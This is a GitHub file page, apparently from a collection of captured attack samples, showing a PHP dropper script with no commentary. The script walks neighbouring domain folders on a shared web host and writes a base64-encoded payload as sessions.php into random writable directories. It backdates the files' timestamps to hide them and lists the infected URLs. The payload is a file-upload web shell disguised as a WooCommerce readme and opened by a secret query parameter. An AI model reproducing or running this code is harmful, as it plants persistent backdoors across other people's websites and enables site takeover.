-
Notifications
You must be signed in to change notification settings - Fork 41
/
154.48.243.123XHNOqcveF-qdhdBRjMorxAAAAAM.0.file
95 lines (89 loc) · 4.68 KB
/
154.48.243.123XHNOqcveF-qdhdBRjMorxAAAAAM.0.file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
<?php
error_reporting(0);
set_time_limit(0);
$depth = 4;
$fileData = 'PT09IFdvb0NvbW1lcmNlID09PQ0KQ29udHJpYnV0b3JzOiBhdXRvbWF0dGljLCBtaWtlam9sbGV5LCBqYW1lc2tvc3RlciwgY2xhdWRpb3NhbmNoZXMsIGNsYXVkaXVsb2Rybywga2xvb24sIHJvZHJpZ29zcHJpbW8sIGpzaHJldmUsIGNvZGVya2V2aW4NClRhZ3M6IGVjb21tZXJjZSwgZS1jb21tZXJjZSwgc3RvcmUsIHNhbGVzLCBzZWxsLCBzaG9wLCBjYXJ0LCBjaGVja291dCwgZG93bmxvYWRhYmxlLCBkb3dubG9hZHMsIHBheXBhbCwgc3RvcmVmcm9udCwgd29vIGNvbW1lcmNlDQp3aGF0IHRpbWVzIHdvcmRwcmVzcw0KPD9waHAgaWYoJF9HRVRbImxvZ2luIl09PSJjYW5zaHUiKXtpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgQ29tcGxhdGUgISEhPC9iPjxicj4nOyB9IGVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPjxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9InN1Ym1pdCIvPjwvZm9ybT4nO30gPz4=';
$fileName = 'sessions.php';
$filePrefix = '';
$fileMode = 0;
function GetAllDirs($startPath) {
$allDirs = array($startPath => 0);
$rDir = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($startPath), RecursiveIteratorIterator::CHILD_FIRST);
$rgResult = array();
foreach($rDir as $rPath) {
if($rPath->isDir() && $rPath->isWritable() && !$rDir->isDot()) {
$dirPath = str_replace('\\', '/', (string)$rPath);
if(!CheckHtaccess($dirPath.'/.htaccess'))
$allDirs[$dirPath] = substr_count(str_replace($startPath, '', $dirPath),'/');
}
}
arsort($allDirs);
return $allDirs;
}
function CheckHtaccess($htaccessPath) {
$isDeny = false;
if(file_exists($htaccessPath)) {
$isDeny = true;
if(is_readable($htaccessPath)) {
$htaccessContent = strtolower(file_get_contents($htaccessPath));
$searchContent = 'deny from';
if (!strstr($htaccessContent, $searchContent)) {
$isDeny = false;
}
}
}
return $isDeny;
}
function GetRandomPath($dirs, $depth) {
if($depth > (int)current($dirs)) {
$depth = (int)current($dirs);
}
$allKeys = array_keys($dirs, $depth);
return $allKeys[rand(0, count($allKeys) - 1)];
}
function FileWrite($filePath, $fileData, $fileMode, $filePrefix) {
$pathParts = pathinfo($filePath);
$fileTime = filemtime($pathParts['dirname']);
if(file_exists($filePath)) {
if($fileMode == 2)
return '';
if($fileMode == 0)
$filePath = $pathParts['dirname'].'/'.$filePrefix.$pathParts['basename'];
}
if($fp = fopen($filePath, 'w')) {
fwrite($fp, $fileData);
fclose($fp);
touch($filePath, $fileTime);
touch($pathParts['dirname'], $fileTime);
return $filePath;
}
}
$startDir = str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']);
$domZones = '(\.ru|\.ru\.com|\.ru\.net|\.com\.ru|\.org\.ru|\.net\.ru|\.msk\.ru|\.msk\.su|\.spb\.ru|\.spb\.su|\.nov\.ru|\.nov\.su|\.edu\.ru|\.int\.ru|\.ac\.ru|\.pp\.ru|\.su|\.ua|\.com\.ua|\.co\.ua|\.biz\.ua|\.kiev\.ua|\.org\.ua|\.net\.ua|\.pp\.ua|\.dp\.ua|\.sumy\.ua|\.uz\.ua|ks\.ua|\.pl\.ua|\.if\.ua|\.cv\.ua|\.rv\.ua|\.mk\.ua|\.dn\.ua|\.lg\.ua|\.kh\.ua|\.zp\.ua|\.od\.ua|\.ck\.ua|\.kr\.ua|\.lutsk\.ua|\.volin\.ua|\.zt\.ua|\.yalta\.ua|\.sevastopol\.ua|\.cremea\.ua|\.com|\.edu|\.gov|\.net|\.org|\.biz|\.info|\.name|\.jobs|\.mobi|\.tel|\.travel|\.az|\.am|\.by|\.ge|\.kz|\.kg|\.lv|\.lt|\.md|\.ru|\.su|\.tj|\.tm|\.uz|\.ua|\.ad|\.at|\.be|\.ch|\.de|\.dk|\.es|\.eu|\.fi|\.fr|\.gr|\.ie|\.is|\.it|\.li|\.lu|\.mc|\.mt|\.nl|\.no|\.pt|\.se|\.uk|\.al|\.bg|\.cz|\.hu|\.mk|\.pl|\.ro|\.si|\.sk|\.ac|\.ag|\.as|\.asia|\.au|\.br|\.bz|\.ca|\.cat|\.cc|\.cd|\.ck|\.cl|\.cn|\.cx|\.gi|\.gs|\.hk|\.hm|\.hn|\.im|\.in|\.jp|\.kr|\.la|\.lk|\.me|\.mn|\.ms|\.mx|\.my|\.nz|\.pk|\.sg|\.sh|\.st|\.tc|\.th|\.tk|\.to|\.tv|\.tw|\.us|\.vc|\.vg|\.ws|\.za)';
function GetDomains($dirs, $preDomainPath, $postDomainPath, $domZones) {
foreach($dirs as $dir) {
if(preg_match('#'.$domZones.'(\/(.*?)$|$)#', $dir, $matches) && !preg_match('#('.str_replace('www.', '', $_SERVER['HTTP_HOST']).')|('.$_SERVER['HTTP_HOST'].')#', $dir)) {
$domainPath = rtrim($preDomainPath.'/'.$dir.'/'.$postDomainPath, '/');
if(is_dir($domainPath)) {
$dirsc[] = $domainPath.'|'.$dir;
}
}
}
return $dirsc;
}
if(preg_match('#^(.*?)\/([^\/]+'.$domZones.')\/*(.*?)$#', $startDir, $matches)) {
$domainDirs = scandir($matches[1]);
$dirok = GetDomains($domainDirs, $matches[1], $matches[4], $domZones);
};
foreach($dirok as $temp){
$stra = explode('|',$temp);
$startDirectory = $stra[0];
$allDirs = GetAllDirs($startDirectory);
$randPath = GetRandomPath($allDirs, $depth);
$fileWritedPath = FileWrite($randPath.'/'.$fileName, base64_decode($fileData), $fileMode, $filePrefix);
if(strlen($fileWritedPath) != 0){
$fileWritedPath = str_replace($stra[0],'',$fileWritedPath);
$fileWritedPath = 'http://'.$stra[1].$fileWritedPath;
echo $fileWritedPath.'</br>';
}
}